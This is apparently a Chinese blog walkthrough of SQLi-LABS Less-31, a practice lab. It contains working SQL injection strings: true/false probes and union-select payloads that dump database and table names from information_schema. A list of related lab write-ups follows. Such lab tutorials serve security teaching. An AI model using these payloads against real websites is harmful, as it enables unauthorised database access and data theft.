第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号

在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示

再输入 1") and false-- a,使SQL恒不成立,页面空显示

由此判断存在SQL注入,注入点为双引号+括号的字符型注入

页面有显示位,我们可以使用联合注入进行脱库

-1") union select 1,2,
(select group_concat(schema_name) from information_schema.schemata)
-- a

脱表

-1") union select 1,2,
(select group_concat(table_name) from information_schema.tables where table_schema='security')
-- a

SQLi LABS Less-31相关推荐

  1. SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注

    第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...

  2. SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注

    第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...

  3. SQLi LABS Less 26a 联合注入+布尔盲注

    第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and  or ),注释(/*  #  --  /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...

  4. SQLi LABS Less 25 联合注入+报错注入+布尔盲注

    第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...

  5. sqli——labs初学者通关详

    目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...

  6. SQLi LABS Less-19

    第19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号 ...

  7. SQLi LABS Less-35

    第三十五关注入点为 数值型 , 注入方式为 报错注入 此关卡通过 代码WAF 转义了单引号' , 我们使用 编译 绕过WAF , 先上结果 ?id=1 and updatexml(1,concat(0 ...

  8. SQLi LABS Less-34

    第三十四关注入点为 单引号字符串型 , 注入类型为 报错注入 此关卡通过 代码WAF 将单引号' 转义成 /' , 我们使用 编译 绕过WAF , 先上结果 �' and updatexml(1,co ...

  9. SQLi LABS Less-11 联合注入+报错注入

    第十一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解 原理+步骤+实战教程 第一步.判断注入类型 用户名输入: a' or 1 -- a 密码随便输入: ...

最新文章

  1. JSON.stringify报cyclic object value错误
  2. PHP 学习 一 基础
  3. Linux内核中读写文件数据的方法
  4. SSDB 配置文件详解
  5. fullgc触发条件_JVM的内存分配策略以及进入分代的条件
  6. 交换机网络故障及原因分析集锦
  7. 为什么要使用git pull --rebase?
  8. 变压器绕组降低邻近效应_低频变压器初级短路的原因及解决方案
  9. 排队论在计算机和通信领域的应用,随机过程与排队论——及其在计算机领域中的应用.pdf...
  10. linux数据包大小控制,linux udp 数据包大小问题
  11. html做彩色方格,超级炫酷,美图秀秀制作超漂亮彩色格子字图文教程
  12. 现代信号处理——盲信号分离(盲信号分离的基本理论)
  13. 无心剑中译莎士比亚诗20首
  14. openwrt热插拔HotPlug
  15. AI-语音处理理论与应用-语音处理简介
  16. 真正的人品,藏在对弱者的态度里
  17. 车牌识别定位 matlab基本方法和操作
  18. 驱动程序开发:无设备树和有设备树的platform驱动
  19. 【C语言】--编译及编译器
  20. UVAlive 4394

热门文章

  1. 网络操作系统课后练习第三章
  2. java基础面试题总结
  3. 通讯框架 t-io 学习——给初学者的Demo:ShowCase设计分析
  4. python爬虫播放mp3
  5. iOS for 和 forin 的区别 以及注意事项
  6. 窥探算法之美妙——寻找数组中最小的K个数python中巧用最大堆
  7. sqlserver 2008修改数据库表的时候错误提示“阻止保存要求重新创建表的更改”...
  8. datagridview的数据存取
  9. 云计算的SPI服务模型
  10. Linux下的Asp.Net配置指南